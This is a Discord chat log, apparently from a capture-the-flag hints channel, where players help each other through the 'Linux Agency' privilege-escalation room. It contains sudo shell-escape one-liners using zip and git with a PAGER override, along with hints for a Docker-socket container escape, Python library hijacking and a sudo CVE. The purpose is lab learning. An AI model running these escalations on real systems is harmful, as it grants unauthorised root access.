|| Thanks for all the help, right now when I enter the passphrase follows up with asking for the PW. I've chmodded id_rsa to 400 so it's not that. When I enter the wrong pw it doesn't ask for the password ||

This user has given me such a hard time lol

||As maya I ran ssh -i old_robert_ssh/id_rsa robert@127.0.0.1:2222 ||

||Do you move the id_rsa.pub?||

||nope||

ok, got sean flag 🎉

||I'm logged in as maya at ~ and when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1:2222" I get cannot resolve hostname, when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1 -p 2222" I get asked for robert's pw. I haven't done the other parts of the challenge on this machine, I logged in as agent47 then went straight to maya since I got stuck here last night(just letting you know if that might be where the issue is)||

||my bad its -p 2222 not :2222 the password is the passphrase ........ password re-use ||

D'oh, I always give up too quick

also thanks

@manic citrus thanks it worked

SETENV perm means i can set environ variable direct from sudo -u ...right?

@verbal flume Mallow as in Mallow in Cork... ?

Nope

kk 🙂

Np

Yeah its a sudo miss-configuration to allow it

@manic citrus got ken as well😄

Any luck so far?

Not, I found ||docker binary at /tmp|| but not sure what to do with it.

||there is another exploit needed to privesc to find user.txt ||

any tips for priv esc to penelope?

|| Do you have the Sean flag? ||

yup

|| There's something on the same line as it. Take a look||

ah kk

ty

that one had me scratching my head for 2 days lol

I feel completely exhausted with Linux Agency — the gunshop script is not returning the same error as everyone else is seeing

I’m using AttackBox

haha, has me wrecked 😂

I’ve rebooted the machine 5 times now at least.

@solar needle what are the exact priv esc methods you are using? I got some help earlier and I am no longer seeing them

||Im using TF=$(mktemp -u) zip $TF /etc/hosts -T -TT 'sh #' to get to Dalia. Then I’m using git help config !/bin/sh to get to Reza||

ok, don't use that git method

use (a) for git on GTFO

sudo -u USER and then the command from GTFO

that's where I was going wrong

worked for me then 🙂

a has never worked for me

try again

But if it gives me a shell why should it stop me progressing?

no idea

I used (b) under sudo

interesting

I used (b) and had issues

perhaps it's a red herring

but I went with (a) and it's working now

have worked through several other users since

This is what I keep getting, even before continuing

|| reza@linuxagency:/home/reza$ sudo -u jordan /opt/scripts/Gun-Shop.py
sudo: unable to open audit system: Permission denied
sudo: pam_open_session: System error
sudo: policy plugin failed session initialization||

that's the exact error I was getting

When I used a, it kept asking me for a password.

||sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help||

Presumably because it doesn’t start with git

Are you using AttackBox?

||I used method e||

no

I wonder whether it’s an AttackBox issue

what is this ||base64|| file for?

|| Penelope?||

But if the net result is a PrivEsc, why should that stop the next step from working 😭

yup

I think it's something to do with env but not going to dig in to it right now

Yea, I think you go a little too long with out a checkpoint in part 4

||You have access to maya's files with it||

It’s exhausting to reset the room so often, and losing progress

that's what I thought

||Get to penelope thats a checkout||

It should be a part of the testing process than all rooms are cross checked using the AttackBox too

I ended up just writing down all the commands I used to escalate and then copy pasted them into the cmd once I got in as ||dalia||

I can’t even get this Python script executing without errors.

Let me reset and try with a

Anyone got root.txt yet ?|| wondering if its docker escape, route back from docker over ssh or local privesc as maya||

||My money's on docker escape given success.txt||

Any hint on getting maya theres a binary with suid perm,,is it binary exploitation

Same, it should be part of your process to take notes as you go any way . The amount of times I grep through my notes dir when working other boxes 😄

And are you all stabilising shells after each PrivEsc?

Nope, just straight through

^

||Do you have her flag||

Aha. So (a) is working now, and I can finally see the ||shop|| error

||Nope I have penelope||

||Check what you can do with base64||

agree 😄

||https://gtfobins.github.io/gtfobins/base64/||

||Have you got anywhere with root.txt? I tried killing the running docker container, based on the hint I figured you need to boot yourself out, and just got kicked back to maya, can't get back in there||

Just got root.txt

How?

||Hitting the docker socket from within the container ||

can you link a guide? Im not very well versed with ||docker||

@manic citrus any hint on the user.txt ?

||Have you run linpeas.sh?||

Have dm'd you as not sure on rules for links like this in the server

You're fine to link things

Ironically, DMing without prior permission is against the rules

||docker.sock|| ?

lol, my bad on both

||check the sudo -l list||

||What do you mean by hit, I tried sshing, and it doesn't have nc or telnet||

As James said it was ok ||https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html||

It doesn't give the answer but is the method and should be enough info to get there

||ssh to localhost not 127||

any hint on sean's flag?

||the group he is in allows him to read log files||

@manic citrus thanks bro ❤️

I'm only on THM a short while (60 day streak today since I joined) but this is the wildest room ever 😄

a serious amount of effort went in to creating it

||What do you mean?||

||have you ssh'd as Robert yet?||

||Yes, I'm in there as root||

ah ok 🙂

you're ahead of me so 🙂

||docker escape||

and a misconfiguration

||Where I'm at is I've got a running container, however I can't figure out how to hook that up to current session and interact, or run commands remotely||

not got user yet, nevermind root

||Im in docker where do i get this user.txt||

Yea same, I tried socat but it's not working

||one privesc'd in the container from robert to root I copied socat across and then followed that page . I had to change container.json from ubuntu to mangoman ||

||socat is not installed in the container, you need to copy it manually either from the host or from your box ||

yea i used ||wget from my python server||

||set perms||

||You need to chmod +x and then ./socat instead of socat||

done ./ too but Ill try again

||@verbal flume / @cold bay you also need to modify the mount spec inside the config file to mount / instead of /etc from the host ||

||any hint Im in docker Im seeing /bin/bash but no idea||

this too 🙂

is || docker escape|| the only option once I've ||ssh'd as Robert|| ?

Yes, you are connected to the API so now you need to send the requests

||https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout|| this might help

||docker in tmp?||

try it

socat looks overly complicated, but I suppose if that wasn't there

||I'm stuck in robert, what to do next?||

keep searching

there is silliness afoot

I'm out of my depth right now with Docker, will come back to it in the morning

it's been fun 🙂

||i found the docker file and sudo -l, have no idea what to do next||

Thanks, ||I spent quite a bit of time trying to get it to give me a reverse shell, but that didn't seem to work||

Thanks, ||I need to read my linpeas output more closely||

yes you do.

Im trying to escape the docker but curl says could couldn't connect to server

Maybe will try socat method

||Am i looking for a CVE to get the user.txt?||

||yes, there is a CVE and it should be reported by linpeas or other privesc scripts||

Anyone kind enough to provide a hint for mission25 for Linux Agency?

Are you already user mission25 trying to get to mission26 ? or are you mission24 trying to get to 25 ?

Did you manage to get the root flag ?

Yea

I’m user mission24 trying to get 25.

||You need to set a new environment variable with the correct value using export variable=value and then execute the binary again . ||

how can you cover the msg like that

use ||

put ||| either side of the text or use the eye icon when you highlight the text

||spoiler||

Thank you! I appreciate the hint.

doing the mr.robot room right now and i got a questions about netcat

when i run it i get a message saying Listening on 0.0.0.0< port>

but for many writeups people have it as listening on app <port>

is something wrong with my netcat?

No

It's just a different version

ohhhh

cause i cant seem to get the shell no matter what

I'm stuck trying to get jordan's flag in the Linux Agency room. When I run the script as jordan, it says no module named shop

||take a look at SCENARIO 3 at https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8||

Oh, I apraciate that. Thank you!

||Does the CVE has anything to do with docker.sock?||

||to get the user.txt it is a sudo CVE from 2019 ||

Can't believe I missed that, thanks

No worries, glad I could point you in right direction

Hi all, tearing my hair out here. Exploiting NFS in Network Services 2, and when I run sudo mount -t nfs 10.10.91.213:/home /tmp/mount -nolock I get the error mount.nfs: access denied by server while mounting 10.10.91.213:/home

Please help, wasted the last hour on this with no luck

Please don't ask the same question across multiple channels like that

Are you using a VM?

No problem, but could you please advise the difference between room-hints and room-help? To the unknowing discord user they both seem like the same thing

Yes I'm using a VM

Are you running the VPN in the VM or on the host OS?

I'm running the VPN on the host OS

#room-hints is for hints. #room-help is for help, once you've checked the writeups and are sure you're using the correct method

Don't do that

Run it in the VM

Oh ok, thanks

All reverse shells, other services too, things break when you run it on the host and NAT stuff

No worries, it would be good for other users to include this info in the https://tryhackme.com/access page 🙂